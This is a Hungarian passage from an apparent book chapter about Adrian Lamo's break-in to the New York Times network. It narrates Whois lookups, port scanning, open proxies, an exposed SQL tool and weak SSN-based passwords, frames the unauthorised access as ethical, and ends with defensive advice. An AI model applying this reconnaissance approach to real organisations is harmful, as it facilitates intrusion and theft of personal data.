elgondolkodtató.)

Hős, de nem szent: A New York Times hack

Adrian egyik nap a New York Times weboldalát olvasgatta, amikor


pusztán kíváncsiságból átvillant az agyán, hogy vajon valahogy be
tudna-e törni az újság számítógépes hálózatába. – Korábban már
hozzáférést szereztem a Washington Posthoz – mondta, de elismerte,
hogy erőfeszítése nem sok eredményt hozott. – Semmi igazán
érdekeset nem találtam.
A Times sokkal nagyobb kihívásnak tűnt, hiszen valószínűleg eléggé
kényesek lettek a biztonságra a néhány évvel ezelőtt történt, igen széles
körben ismertté vált és kínos hackelés után, amikor egy HFG
(„Hacking fór Girlies”) nevű csoport feltörte a weboldalukat. A
hackerek a Times technológiai szakíróját, John Markoffot kritizálták a
rólam írt sztorikért, amelyek hozzájárultak ahhoz, hogy az Igazságügyi
Minisztérium olyan durván bánt velem.
Adrian felment az Internetre, és kutakodni kezdett. Először is
felkereste magát a weboldalt, és gyorsan rájött, hogy kihelyezték; nem
maga a Times hostolta, hanem egy külső Internet szolgáltató. Ez
minden cég számára jó gyakorlat; az oldalra való sikeres betörés nem
jelent automatikusan a céges hálózathoz való hozzáférést. Adrian
számára ez azt jelentette, hogy kicsit keményebben kell megdolgoznia
a bejutáshoz.
– Számomra nem létezik egy állandó lista, amin végigmennék –
mondja Adrian betörési módszerének jellemző megközelítéséről. De
„amikor felderítést végzek, egyéb forrásokból informálódom”. Ez más
szavakkal azt jelenti, hogy nem azonnal a támadni kívánt cég
weboldalán próbálkozik, hiszen ezzel hozzá vezető nyomot hagyhatna
ott. Viszont értékes kutatási eszközök érhetők el teljesen szabadon az
American Registry for Internet Numbers (ARIN) oldalán. Ez a
nonprofit szervezet felel az észak-amerikai Internet-számozási források
kezeléséért.
A „New York Times” nevét az arin.net oldal Whois
párbeszédablakba beírva az alábbihoz hasonló adatok jelennek meg;
New York Times NYT-3)
NEW YORK TIMES COMPANY (NYT-4)
New York Times Digital (NYTD)
New York Times Digital (AS21568) NYTD 21568
NEW YORK TIMES COMPANY NEW-YORK84-79 (NET-12-160-
79-
0-1) 12.160.79.0 – 12.160.79.255
New York Times SBC068121080232040219 (NET-68-121-80-232-
1) 68.121.80.232 – 68.121.80.239 New York Times Digital PNAP-
NYM-NYT-RM-01 (NET-64-94-185-0-1) 64.94.185.0 – 64.94.185.255
A ponttal elválasztott, négy számból álló csoportok IP-címek,
amelyekre tekinthetünk úgy, mint a postai címek házszámának, utca–,
város– és államnevének internetes megfelelőire. A címtartományt
mutató listát (például 12.160.79.0 – 12.160.79.255) netblocknak
nevezzük.
Ezt követően Adrian portszkennelést hajtott végre a New York
Timeshoz tartozó címtartományon, majd hátradőlt, várva, amíg a
program nyitott portok után keresve letapogatja a címeket, és azt
remélte, hogy olyan érdekes rendszereket fog azonosítani, amelyeket
megtámadhat. Így is lett. A nyitott portok számát megvizsgálva
felfedezte, hogy itt is voltak olyan rendszerek, amelyek hibásan
beállított nyitott proxykat futtattak – lehetővé téve számára, hogy a cég
belső hálózatán levő számítógépekhez csatlakozzon.
Utánanézett az újság domain névszerverének (DNS), azt remélve,
hogy talál egy nem kihelyezett, belső IP-címet, azonban nem járt
sikerrel. Ezt követően megpróbálta megszerezni a nyimes.com domain
összes DNS rekordját. Miután ez a kísérlet sem járt sikerrel, visszament
a weboldalra, és ez alkalommal nagyobb szerencséje volt: talált az
oldalon egy olyan részt, ahol a Times azon alkalmazottainak az e-mail
címeit közölte a látogatókkal, akik hajlandóak voltak levelet fogadni a
közönségtől.
Perceken belül e-mail üzenetet kapott az újságtól. Nem azt
tartalmazta ugyan, amit kért, vagyis az újságírók e-mail címének a
listáját, de így is értékes volt.
Az e-mail fejléce elárulta, hogy az üzenet a cég belső hálózatából
jött, és egy nyilvánosságra nem hozott IP-címet tartalmazott. – Az
emberek nem jönnek rá, hogy akár egy e-mail is árulkodó lehet – mutat
rá Adrian.
A belső IP-cím sikerrel kecsegető utat mutatott neki. Adrian
következő lépése az volt, hogy manuálisan letapogatva az ugyanabban
a hálózati szegmensben levő IP-címeket, elkezdett végigmenni a
korábban talált nyitott proxykon. Annak érdekében, hogy kicsit
megvilágítsuk az eljárását, tegyük fel, hogy a cím 68.121.90.23 volt.
Míg a legtöbb támadó a 68.121.90.1-gyel kezdené és 68.121.90.254-ig
egyenként haladva tapogatná le a cím netblockját, Adrian megpróbálta
a cég a hálózatot beállító informatikusának a helyébe képzelni magát,
és feltételezte, hogy ez a személy valószínűleg kerek számokat
választana ki, így szokásos gyakorlata szerint a kisebb számokkal
kezdte.1-től 10-ig, majd a tízesekkel folytatta,.20,.30 és így tovább.
Az erőfeszítés nem sok eredménnyel járt. Talált ugyan néhány belső
webszervert, de egyiken sem volt túl sok információ. Végül egy olyan
szerverbe botlott, amely a Times egy régi, már nem használt intranet
oldalát tartalmazta, amit valószínűleg az új oldal üzembe helyezésekor
vontak ki a forgalomból, és azóta megfeledkeztek róla. Érdekesnek
találta, végigolvasta, és felfedezett egy linket, amely látszólag egy régi
oldalra mutatott, azonban mint rögtön kiderült, a link egy jelenleg is
működő gépre vitte őt.
Adrian számára ez maga a Szent Grál volt. A helyzet még ennél is
biztatóbbá vált, amikor felfedezte, hogy a gép olyan képzési anyagokat
tartalmazott, amelyek azt tanítják meg az alkalmazottaknak, hogyan
használják a rendszert; kicsit olyan volt, mint amikor egy diák ahelyett,
hogy Dickens Szép remények című regényét az elejétől végig elolvasná
és kijegyzetelné, készen megkapja a regény pár oldalas összefoglalását.
Adrian már elég sok oldalt feltört ahhoz, hogy ebben az állapotban
még ne érezzen különösebb örömöt, azonban jobban haladt előre, mint
ahogy azt várhatta. És még csak most fordultak igazán jóra a dolgok.
Hamarosan felfedezett egy az alkalmazottak számára készített beépített
kereső motort, amivel gyorsabban találhatták meg az oldalon az őket
érdeklő dolgokat. – A rendszergazdák gyakran rosszul állítják be
ezeket – mondja –, és olyan kereséseket engednek meg, amelyeknek
tiltva kellene lenniük.
Ez ebben az esetben is így volt, és ez adta meg – Adrian szavaival
élve – „a kegyelemdöfést”. A Times valamelyik rendszergazdája
szabad SQL lekérdezést lehetővé tevő segédalkalmazást helyezett el az
egyik könyvtárban. Az SQL, vagyis a Structured Query Language
(Strukturált Lekérdező Nyelv) elterjedt szabványos programnyelv az
adatbázisokhoz. Ebben az esetben egy felbukkanó párbeszédablak
jelent meg, ahova Adrian ellenőrzés nélkül vihetett be SQL
parancsokat, ami azt eredményezte, hogy lényegében a rendszer összes
adatbázisában kereshetett, sőt, tetszése szerint letölthette, illetve
megváltoztathatta az adatokat.
Felismerte, hogy az eszköz, ahol a levelezőszerverek működtek,
Lotus Notes-on futott. A hackerek nagyon jól tudják, hogy a Lotus
régebbi verziói lehetővé teszik a felhasználónak, hogy a rendszeren
levő összes adatbázisban böngésszenek, és a Times hálózatának ezen
része egy régebbi verziót futtatott. A Lotus Notes adatbázis, amelybe
Adrian belebotlott, nagyon izgatottá tette, mert az utolsó újságárustól
kezdve mindenkit tartalmazott, és még azt is, hogy mennyit kerestek és
mi a társadalombiztosítási számuk. – Előfizetői információk is voltak
itt, illetve adatok mindenkiről, aki valaha is panaszt tett a szolgáltatás
miatt, vagy érdeklődött valami után.
Mikor megkérdeztem, hogy milyen operációs rendszert használt a
Times, Adrian azt válaszolta, hogy nem tudja. – Ilyen szempontból nem
elemzem a hálózatot – magyarázta.
Nem a technológiáról szól az egész, hanem az emberekről, és arról,
ahogy a hálózatokat konfigurálják. A legtöbb ember igen kiszámítható.
Gyakran találkozom azzal, hogy az emberek újra meg újra ugyanúgy
építik fel a hálózatokat.
Sok e-kereskedelmi oldal követi el ezt a hibát. Azt feltételezik, hogy
az emberek a szabályos módon fogják bevinni az adatokat. Senki sem
feltételezi, hogy a felhasználó nem így fog tenni.
E kiszámíthatóság miatt egy képzett támadó képes arra, hogy
megrendelést adjon fel egy online weboldalon, a vásárlás folyamatában
eljut odáig, hogy az adatait ellenőrzik, majd visszalép, és
megváltoztatja a számlázási adatokat. A támadó megkapja az árut;
valaki másnak pedig megterhelik a hitelkártyáját. (Bár Adrian
aprólékosan elmagyarázta nekem ezt az eljárást, kifejezetten kérte,
hogy ne írjam le olyan részletességgel, amely másoknak is lehetővé
tenné annak kipróbálását.)
Kiindulópontja az, hogy a rendszergazdák rutinszerűen elmulasztják,
hogy a támadó agyával gondolkodjanak, ami a szükségesnél sokkal
jobban leegyszerűsíti a támadók munkáját. Pontosan ez magyarázza a
következő lépés sikerét, amellyel sikerült behatolni a Times
számítógépes hálózatába. A belső kereső motornak nem lett volna
szabad az egész oldalt indexelnie, mégis ezt tette. Adrian talált egy
SQL űrlapot felhozó programot, amely űrlap lehetővé tette neki, hogy
átvegye az adatbázisok felett az irányítást, így többek között szabadon
gépelhetett be lekérdezéseket. Ezt követően meg tudta találni a
rendszeren levő adatbázisok neveit, ezért érdekesnek hangzó nevek
után keresett. Ily módon egy igen izgalmas adatbázisra bukkant: egy
felhasználói nevek és jelszavak listájával teli adatbázist talált, amely
első látásra a New York Times összes alkalmazottját tartalmazta.
Kiderült, hogy a legtöbb jelszó egyszerűen az adott személy
társadalombiztosítási számának utolsó négy számjegye volt. És a cég
még azzal sem bajlódott, hogy a különösen bizalmas információkat
tartalmazó területekhez való hozzáférésre más jelszavakat használjon –
ugyanaz az alkalmazotti jelszó működött az egész rendszeren. És
amennyire ő tudja, mondta Adrian, a
Times-nál jelenleg használatban levő jelszavak sem
biztonságosabbak a támadása idején használtaknál.
Onnan képes voltam visszajelentkezni az intranetre, és további
információkhoz szereztem hozzáférést. Be tudtam futni a hírközpontba,
ahova a hírmenedzser jelszavával jelentkeztem be.
Talált egy adatbázist, amely a terrorizmus vádjával az USA által
fogva tartott összes személyt felsorolta. A lista olyan neveket
tartalmazott, amelyek még nem is láttak napvilágot. A kutatást tovább
folytatva felfedezett egy másik adatbázist, amely azokat tartalmazta,
akik valaha is op-ed cikket írtak a Timesnek. (Az op-ed, vagyis az
opposite the editorial page a szerkesztői oldal mellett levő, általában
saját véleményeket tartalmazó cikket jelent. A Vélemények rovatnak
felel meg.) Több ezer cikkíró, azok címe, telefonszáma és
társadalombiztosítási száma volt itt felsorolva. Rákeresett a „Kennedy”
névre, és több oldalnyi adatot talált. Az adatbázis olyan híres és
közéleti emberek elérhetőségét tartalmazta, mint például Harvard-os
professzorok, Robert Redford vagy Rush Limbaugh.
Adrian hozzáadta a listához a saját nevét és mobilszámát (amely egy
északkaliforniai körzetszám alapján az „505-HACK”). Természetesen
arra számítva, hogy az újságnál sohasem veszik észre, hogy belenyúlt a
listába, és azt remélve, hogy becsaphat néhány újságírót vagy a
vélemények rovat szerkesztőjét, a szakértelem mezőbe a „számítógépes
hackelés/biztonság és kommunikációs hírszerzés” területet írta be.
Rendben, nem helyénvaló, sőt talán megbocsáthatatlan. De
számomra a tette még így is nem csak ártalmatlan, hanem vicces is.
Még most is mosolygok, ha arra gondolok, hogy Adriant felhívják: –
Halló, Mr. Lamo? X. Y. vagyok a New York Timestól. – Majd
megkérik, hogy írjon egy 600 szavas cikket a számítógépes biztonság
állapotáról vagy valami hasonló témáról, amely másnap az ország
legbefolyásosabb újságjának vélemények rovatában jelenik meg.
Nincsen még vége Adrian és a New York Times történetének; a sztori
többi része azonban nem vicces. Ami történt, arra nem volt szükség,
nem jellemző Adrianre, és komoly bajba keverte őt. Miután
meghamisította a vélemények rovat adatbázisát, felfedezte, hogy
hozzáfér a Times LexisNexis előfizetéséhez; ez olyan online
szolgáltatás, amely jogi információkhoz és hírekhez való hozzáférést
nyújt a felhasználóknak. Állítólag öt külön felhasználói nevet állított
be, és temérdek keresést hajtott végre – a kormányzat szerint több mint
3000-et.
Miután három hónapon keresztül úgy böngészte a LexisNexis-t,
hogy a New York Timesnak sejtése sem volt arról, hogy a felhasználói
neveit valaki eltérítette, Adrian végül visszatért ahhoz a Robin Hood
magatartáshoz, amely a más cégek elleni korábbi támadásait
jellemezte. Kapcsolatba lépett egy jól ismert internetes újságíróval (aki
– hozzám hasonlóan – korábban hacker volt), és elmagyarázta neki az
általa felfedezett sebezhetőséget, amely hozzáférést biztosított számára
a New York Times számítógépes rendszeréhez – azonban csak azt
követően, hogy az újságíró beleegyezett abba, hogy semmit nem
jelentet meg a betörésről, amíg nem tájékoztatja az újságot, és azok ki
nem javítják a hibát.
Az újságíró elmondta nekem, hogy amikor felvette a kapcsolatot a
Timesszal, a beszélgetés nem egészen úgy zajlott, ahogy azt akár ő,
akár Adrian várta. A Timest nem érdekelte, amit el kellett nekik
mondania, nem volt szükségük az általa felajánlott információra, nem
akartak közvetlenül Adriannel beszélni, hogy megtudják a részleteket,
és saját maguk akartak utánanézni a dolgoknak A Times embere még
azt sem akarta tudni, milyen módszerrel történt a hozzáférés, végül
csak akkor volt hajlandó leírni a részleteket, amikor az újságíró
ragaszkodott ehhez.
Az újság ellenőrizte a sebezhetőséget, és 28 órán belül
megszüntették a rést, mondja Adrian. De a Times vezetői nem annyira
értékelték, hogy felhívták a figyelmüket erre a biztonsági problémára.
A korábbi Hacking fór Girlies támadás nagy sajtóvisszhangot kapott, és
dühük kétségkívül csak rontott a dolgon mivel a felelősöket soha nem
kapták el. (Ne gondolják, hogy bármilyen közöm volt a támadáshoz; a
tárgyalásra várva előzetes letartóztatásban voltam akkor.) Csak
gyanítom, hogy az informatikusaik nagy nyomás alá kerültek, hogy
biztosan elkerüljék, hogy egy újabb hackertámadás áldozataivá
váljanak Ezért az, amit Adrian kiderített a számítógépes hálózatukról,
jó néhány személy egóját sértette meg, és sokaknak okozott
presztízsveszteséget; ez megmagyarázza az újság merev viselkedését,
mihelyt munkatársai tudomást szereztek arról, hogy valaki visszaélt a
nem szándékos nagylelkűségükkel.
Talán a Times értékelte volna, hogy a tárva-nyitva levő rendszerükről
szóló történet publikálása előtt felhívják a figyelmüket a számítógépes
rendszerükön tátongó lyukra. Talán csak amikor felfedezték a
LexisNexis használatát, akkor döntöttek úgy, hogy bekeményítenek.
Bármi volt is az ok, a Times vezetősége megtette azt a lépést, amelyet
Adrian korábbi áldozatai közül még senki sem tett meg: felhívták az
FBI-t.
Hónapokkal később Adrian megtudta, hogy az FBI keresi őt, és
eltűnt. A szövetségiek sorra felkeresték a családját, barátait és
ismerőseit – egyre jobban szűkítették a hálót, és megpróbálták
kideríteni, hogy vajon valamelyik újságíró ismerősével tudatta-e, hogy
hol tartózkodik. A rosszul kigondolt terv eredményeként végül több
olyan újságíró is idézést kapott a bíróságtól, akikkel Adrian
megosztotta az információit. – A játék – írta az egyik újságíró –
hirtelen komolyra fordult.
Adrian már öt nap után feladta magát. Ehhez az egyik kedvenc
helyszínét választotta, ahonnan gyakran végzett kutatómunkát: egy
Starbuck kávézót.
Amikor a por elült, New York déli körzetének államügyészsége egy
sajtóközleményt adott ki, amelyben azt közölték, hogy a New York
Times Adrian általi hackelése során „az okozott károk elérték [sic] a
körülbelül 300000 dollárt”. A kormányzat szerint az általa végrehajtott
ingyenes letöltések az adott időszakban a New York Times felhasználói
neveivel folytatott LexisNexis keresések 18 százalékát tették ki.[2]
A kormányzat ezt az összeget nyilvánvalóan azon díj alapján
számolta ki, mennyibe egy keresés önnek vagy nekem vagy bármely
más nem LexisNexis előfizetőnek kerül: egyedi, fizesd, amikor
használod alapú keresések esetén egyetlen lekérés 12 dollárba kerül.
Azonban még ha ezzel az ésszerűtlenül magas díjjal számolunk is,
Adriannek akkor is mindennap 270 keresést kellett volna a kérdéses
három hónapban lefolytatnia ahhoz, hogy ilyen magas számat kapjunk.
És tekintettel arra, hogy az olyan nagy szervezetek, mint a Times, navi
díjat fizetnek a korlátlan LexisNexis hozzáférésért, valószínű, hogy
egyetlen centtel sem nőtt a számlájuk Adrian keresései miatt.
Adrian szerint a New York Times epizód kivétel volt a
hackerkarrierjében. Az mondja, hogy csak köszönetét kapott az
Excite@Home-tól és az MCI XbrldCom-tól is (ami csak nagyobb lett,
amikor megbizonyosodtak arról, hogy valóban több száz alkalmazott
fizetésének banki átutalása felett rendelkezett). Adrian hangjából nem a
keserűség, hanem a tényszerűség szól, amikor azt mondja: – A New
York Times volt az egyetlen cég, amelyik bíróság előtt akart látni
engem.
A dolgokat tovább rontotta, hogy a kormányzat valahogyan rávette
Adrian korábbi áldozatait, hogy adjanak jelentést az elszenvedett
károkról – még azon társaságokat is megkeresték, amelyek korábban
megköszönték neki az általa közölt információt. Ez talán nem is
meglepő: egy az FBI-tól vagy a szövetségi ügyészségtől érkező
együttműködési kérést a legtöbb társaság nem meri figyelmen kívül
hagyni, még ha korábban másként is gondolkodtak a történtekről.

Adrian képességeinek egyedülálló természete

A tipikus hackerektől eltérően Adrian egyetlen programnyelvben


sem volt profi. A sikere ezzel szemben abban rejlett, hogy képes volt
elemezni az emberek gondolkodását, azt, hogy hogyan állítják be a
rendszereket, milyen folyamatokat használnak a rendszerek, illetve a
hálózati rendszergazdák a hálózati architektúrák kialakítására. Noha azt
állítja magáról, hogy nagyon gyenge a rövid távú memóriája, mégis
úgy fedez fel sebezhetőségeket, hogy a cég webes alkalmazásain
próbálkozva hozzáférést szerez a hálózatukhoz, ezt követően bejárja a
szóban forgó hálózatot, az agyában türelmesen felépíti annak szerkezeti
diagramját, majd a hálózat egyik sarkában, amelyről a cég azt hitte,
hogy a hozzáférhetetlenség sötét zugába van rejtve, és ezért a
támadásokkal szemben teljesen biztonságos, végül sikeresen kiaknázza
a biztonsági rést.
Saját szavai szerint ezzel átlépi a váratlan határát:
Úgy hiszem, hogy minden összetett rendszerben, legyen az
számítógépes rendszer vagy a világegyetem, van valami közös. Mi
magunk, a rendszer egyéni alkotóelemei rejtjük magunkban ezeket a
hasonlóságokat. Ha sikerül valahogy tudat alatt ráérezni ezekre a
sémákra, akkor néha a kezed alá dolgoznak, és különös helyekre
juttatnak el.
[A hackelés] nekem soha sem a technológiáról szólt, számomra
sokkal inkább egy vallás.
Adrian nagyon jól tudja, hogy ha szánt szándékkal azt a célt tűzi ki,
hogy egy rendszer valamely konkrét tulajdonságát töri fel, az
erőfeszítés nagy valószínűséggel kudarcot fog vallani. Azzal, hogy
hagyja magát szabadon, főleg a megérzései által vezetve barangolni,
általában eljut oda, ahova szeretne.
Adrian nem gondolja, hogy megközelítése annyira egyedi lenne, de
azt elismeri, hogy soha nem találkozott még egy olyan hackerrel, aki
sikerrel járt ezzel a módszerrel.
Az egyik oka annak, hogy egyetlen cég sem vett észre sohasem, noha
ezek a társaságok dollárezreket költenek behatolásészlelésre, az, hogy
én nem azt teszem, amit egy normál behatoló tenne. Amikor egy
feltörésre nyitott hálózati rendszert találok, úgy nézek rá, ahogyan a
normális használat esetén kellene. Azt gondolom. „OK, az
alkalmazottak hozzáférnek az ügyfelek adataihoz. Ha alkalmazott
lennék, mit kérdeznék [a rendszertől]?” Nehéz [a rendszernek]
különbséget tenni a legitim és a nem legitim tevékenység között, mivel
ugyanazon a kezelői felületen megyek keresztül, mint egy alkalmazott.
Lényegében ugyanarról a forgalomról van szó.
Amint Adrian fejében összeáll a hálózat felépítése, „nem annyira a
képernyőn megjelenő számokról szól az egész, sokkal inkább olyan,
mintha ténylegesen ott lennék a sémákat vizsgálva. Ez egyfajta
látásmód, a valóság egy nézete. Nem tudom megmagyarázni, de látom
a fejemben. Felismerem, hogy mi van ott, hogyan épül fel a rendszer,
hogy van kapcsolódnak egymáshoz a dolgok.
Egy az NBC éjszakai hírműsorával Washington DC-ben készített
interjúban a stáb tréfásan kihívta Adriant, hogy próbáljon meg betörni
az NBC rendszerébe. Azt mondja, hogy ott a kamerák előtt öt percen
belül a bizalmas adatok megjelentek a kijelzőjén[3].
Adrian úgy próbál közelíteni egy rendszerhez, ahogy egyrészt egy
alkalmazott, másrészt pedig egy kívülálló közelítene. Hisz benne, hogy
ennek a kettősségnek köszönhetően jön a megérzés, hogy hova menjen.
Néha még szerepjátékokba is belemegy: annak érdekében, hogy a
megfelelő módon gondolkodjon és a megfelelő lépéseket válassza ki,
azt játssza, hogy ő egy olyan alkalmazott, akinek különleges
megbízatása van. Ez olyan jól működik nála, hogy az emberek már
régóta nem tekintik véletlen szerencsének a hihetetlen sikereit.

Könnyen szerzett információ

Egyik este ugyanabban a Starbucks kávézóban, ahol egyszer


Adriannel kávéztam, fontos információhoz jutott. Egy csésze kávé
mellett üldögélt az egyik asztalnál, amikor egy kocsiból öt férfi szállt
ki. Egy közeli asztalhoz ültek le.
így hallotta a beszélgetésüket; hamar nyilvánvalóvá vált számára,
hogy valamilyen rendfenntartó hatóságtól vannak, és majdnem biztos
volt abban is, hogy ez az FBI.
Szakmai dolgokról beszélgettek úgy egy óráig, teljesen
megfeledkezve arról a tényről, hogy ott ültem, és hozzá sem nyúltam a
kávémhoz. Munkahelyi dolgokról beszéltek – kit szeretnek, kit nem.
Ügynökvicceket kreáltak arról, hogy hogyan lehet egy szervezet
hatókörét az által kiadott kitűzőkből megállapítani. Az FBI ügymökök
nagyon kicsi kitűzőket hordtak, míg a Halászati és Szerencsejáték
Minisztérium nagy kitűzőket ad ki, így a hatalom fordított arányban
van a mérettel. Azt hitték, hogy ez vicces.
Útban kifelé az ügynökök felületesen Adrianre néztek, mintha most
jöttek volna rá, hogy a kihűlt csésze kávéba bámuló fiatalember olyan
dolgokat hallhatott, amit nem kellett volna.
Egy másik alkalommal Adrian egyetlen telefonhívással kritikus
információt tudott meg az AOL-ról. Miközben az informatikai
rendszereik igen jól védettek, Adrian komoly sebezhetőséget fedezett
fel, amikor az AOL üvegszálas kábeleit gyártó és fektető céget hívta
fel. Adrian azt állítja, hogy átadták neki az összes elektronikus
térképet, amely azt mutatja, hogy hol vannak lefektetve az AOL fő– és
tartalékkábelei. – Egyszerűen azt gondolták, hogy ha tudod, hogy őket
kell hívni, akkor nyugodtan beszélhetnek veled – mondta. Egy
rosszindulatú hacker, illetve a leállási idő és a javítás több millió
dollárnyi kán okozhatott volna az AOL-nek.
Ez elég rémítő. Adrian és én egyetértünk abban, hogy felforr az
ember agyvize, ha arra gondol, hogy sokan milyen lazán kezelik az
információt.

Napjainkban

2004 nyarán Adrian Lamót hat hónap házi őrizetre ítélték, és további
két évig rendszeres rendőri felügyelet alatt kell állnia. A Bíróság ezen
felül 65 000 dollár kártérítésre kötelezte, amit az áldozatainak kell
fizetnie[4]. Adrian keresőképessége és pénzforrásainak hiánya alapján
(akkoriban hála istennek otthontalan volt) ez a kártérítési összeg
nyilvánvalóan fenyítés jellegű. Kártérítési összeg megállapításakor a
bíróságnak számtalan tényezőt kell mérlegelnie, többek között a vádlott
jelenlegi és jövőbeni fizetőképességét, és az áldozatai által elszenvedett
tényleges károkat. Egy kártérítési fizetési kötelezettség nem fenyítés
jellegű kell hogy legyen. Véleményem szerint a bíró nem igazán
mérlegelte, hogy Adrian képes lesz-e megfizetni egy ilyen nagy
összeget, hanem – mivel Adrian ügyéről sok szó esett a hírekben –
egyszerűen üzenetnek szánta a kártérítés mértékét.
Mind e közben Adrian azon van, hogy rehabilitálja önmagát, és saját
erejéből változtasson az életén. Újságíró iskolába jár egy scramentói
közösségi főiskolán; cikkeket ír egy helyi újságnak, és beleszagolt egy
kicsit a szabadúszó karrierbe is.
Számomra az újságírás a legjobb karrier, amit választhatok,
miközben hű maradok ahhoz, amire igazán bekattanok – a kíváncsiság,
a vágy, hogy másképpen lássam a dolgokat, hogy többet akarjak tudni
a körülöttem levővilágról. Ugyanezek motiválják a hackelést is.
Nagyon remélem, hogy Adrian őszinte volt saját magával és velem,
amikor arról beszélt, hogy tisztában van azzal: életének egy új szakasza
kezdődött.
Hazudnék, ha azt mondanám, hogy az ember egy éjszaka alatt meg
tud változni. Nem tudom egy éjszaka levetkőzni a kíváncsiságomat, de
képes vagyok arra, hogy úgy kamatoztassam, hogy azzal ne bántsam az
embereket. Hiszen ha valamit is tanultam a történtekből, akkor az az,
hogy a hálózatok mögött valódi emberek állnak. Őszintén mondom,
hogy már nem tudok úgy gondolni egy számítógépes behatolásra, hogy
ne jussanak eszembe az emberek, akik éjjelenként emiatt aggódva nem
tudnak elaludni.
Azt hiszem, az újságírás és a fényképészét intellektuális pótszerként
szolgálnak számomra a bűnözés helyett. Kiélhetem bennük a
kíváncsiságomat, különbözőképpen láthatom a dolgokat,
jogkövetőmódon nyomozhatok utánuk.
Szabadúszóként a Network World magazintól is sikerült
megbízáshoz jutnia. Felvették vele a kapcsolatot, forrásként akarták
használni az egyik cikkhez; neki azonban sikerült rábeszélnie őket,
hogy ahelyett, hogy meginterjúvolnák, hadd írja meg ő a cikket. A
magazin szerkesztője belement ebbe, így a hackerekről szóló után jött
az ő cikke a hálózati rendszergazdák bemutatásáról.
Az újságírás az, amivel foglakozni akarok. Úgy érzem, hogy itt
lehetőségem van arra, hogy kicsit változtassak a világon, és a
biztonságtechnikában dolgozva erre vajmi kevés esélyem lenne. A
biztonság olyan iparág, amely túlnyomórészt az emberek
számítógépekkel és technológiával kapcsolatos félelmeire és
bizonytalanságaira támaszkodik. Az újságírás sokkal inkább az
igazságról szól.
A hackelés kizárólag az egóról szól. Benne van a lehetőség, hogy
egyetlen ember kezében olyan mértékű hatalom gyűljön össze, ami csak
kormányzatoknak vagy nagy cégeknek adatik meg. A gondolat, hogy
néhány tizenéves képes lehet arra, hogy kikapcsolja az elektromos
hálózatot, halálra rémíti a kormányzatokat. Legalábbis halálra kellene,
hogy rémítse.
Nem tekinti magát hackernek, crackernek vagy hálózati behatolónak.
– Ha idézhetem Bob Dylant, „Nem vagyok prédikátor vagy utazó
ügynök. Csupán teszem, amit teszek”. Örülök, amikor az emberek
megértenek vagy meg akarnak érteni.
Adrian elmondta, hogy busásan fizető állásokat ajánlottak neki
katonai és szövetségi ügynökségek. Visszautasította mindet. – Sokan
élvezik a szexet, de nem mindenki szeretne abból megélni.
Ez Adrian... a gondolkodó hacker.

BETEKINTÉS

Bárhogyan is vélekedjenek Adrian Lamo hozzáállásáról és tetteiről,


szeretném remélni, hogy egyetértenek velem abban, amit arról
gondolok, ahogy a szövetségi ügyészek kiszámították az általa okozott
„kárt”.
Saját tapasztalataimból tudom, hogyan építik fel az ügyészek a
hackerek eseteiben a vélt árcédulát. Az egyik lehetséges stratégia az,
hogy vallomást kérnek az érintett vállalatoktól, amelyek – annak
reményében, hogy tárgyalás nélkül sikerül beismerő vallomást
kicsikarni a hackerből – eltúlozzák a veszteségeiket. Ezt követően a
védő és az ügyész kicsinyesen alkudozni kezdenek a bírónak
bemutatandó összeg felett; a szövetségi irányelvek szerint minél
nagyobb a veszteség, annál nagyobb lesz a büntetés.
Adrian esetében az ügyészség úgy döntött, hogy figyelmen kívül
hagyja azt a tényt, hogy a cégek azért tudtak a sebezhetőségükről, mert
erről Adrian tájékoztatta őket. Azzal, hogy tanácsot adott a
rendszerüket veszélyeztető rések megszüntetéséről, illetve a hibák
kijavításáig nem engedte a betöréséről szóló sztorit megjelenni, minden
egyes alkalommal a cégeket védte. Nem vitás, hogy törvényt sértett,
azonban – szerintem – etikusan viselkedett.

ÓVINTÉZKEDÉSEK

Az ebben a fejezetben bemutatott, a támadók által gyakran használt


és Adrian által is kedvelt megközelítés, vagyis egy Whois lekérdezés
futtatása eredményeként értékes információkat kaphatunk a világ
különböző földrajzi régióit lefedő négy hálózati információs
központoktól (NIC-ek). Az ezekben az adatbázisokban levő
információk nagy része nyilvános, mindenki számára elérhető, aki a
Whois segédalkalmazást használja, vagy felkeresi a szolgáltatást
üzemeltető weboldal, és beír egy olyan domainnevet, mint például a
nytimes.com.
Az így kapott információk tartalmazhatják a domain adminisztratív
és műszaki kapcsolattartóinak a nevét, e-mail címét, fizikai címét és
telefonszámát. Ezt az információt social engineering támadásokhoz
lehet felhasználni (lásd a 10. fejezetet; Social engineerek – Hogyan
működnek és hogyan akadályozzuk meg őket?). Ráadásul sugallhatják a
cég által használt e-mail cím és felhasználói név sémát is. Ha például
egy hilda@nytimes.com formájú e-mail címet találunk itt, akkor ez azt
a lehetőséget veti fel, hogy nem csak ez az egy alkalmazott, hanem a
Times munkavállalóinak nagy része csupán a keresztnevét használja az
e-mail címében, és valószínűleg a bejelentkezéshez is.
Ahogy Adrian New York Times elleni támadásának történetében
elhangzott, értékes információkat kapott az újságnak kiosztott IP-
címekről és netblockok-ról is, amelyek aztán kulcsfontosságú szerepet
játszottak sikeres támadásában. Az információkiszivárgás korlátozása
érdekében fontos lépés lehet, hogy a cégek csak a telefonközpontjaik
telefonszámát adják meg, az egyes munkavállalókét pedig ne. A
telefonkezelő recepciósokat alapos képzésnek kell alávetni, hogy
gyorsan felismerjék, ha valaki információt próbál meg kicsalni tőlük.
Hasonlóképpen csupán a központi e-mail címeket szabad
megjelentetni, az egyes részlegekét már nem.
Ami ennél is jobb: a cégeknek immár lehetőségük van arra, hogy
titokban tartsák a domainnévhez kapcsolódó kontaktadatokat – már
nem kötelező azokat a bárki érdeklődésére megjelenített adatok között
szerepeltetni. Kérésre korlátozzák a cégről megjelentetett
információkat, ami megnehezíti a támadók számára e megközelítés
alkalmazását.
Egy másik értékes ötlet hangzott el a történetben; egy split-horizon
(osztott horizontú) DNS beállítása. Ez egyrészt egy hostneveket a belső
hálózaton feloldó belső DNS szerver üzembe helyezését, másrészt egy
külső, a nyilvánosság által használt hostok rekordjait tartalmazó DNS
szerver beállítását jelenti.
Egy másik kutatási módszer során a hacker megkérdezi a jogosult
(authoritive) domain névszervereket, hogy megtudja a céges
számítógépek típusát és az operációs rendszer platformját, illetve
információt szerezzen a cég teljes domainjének feltérképezéséhez. Ez
az információ nagyon hasznos a további támadás koordinálásában. A
hálózati rendszergazdáknak kerülniük kellene, hogy a nyilvánosan
elérhető DNS szervereken HINFO rekordokat jelenítsenek meg.
Egy másik hackertrükk egy zone transfernek nevezett műveletet
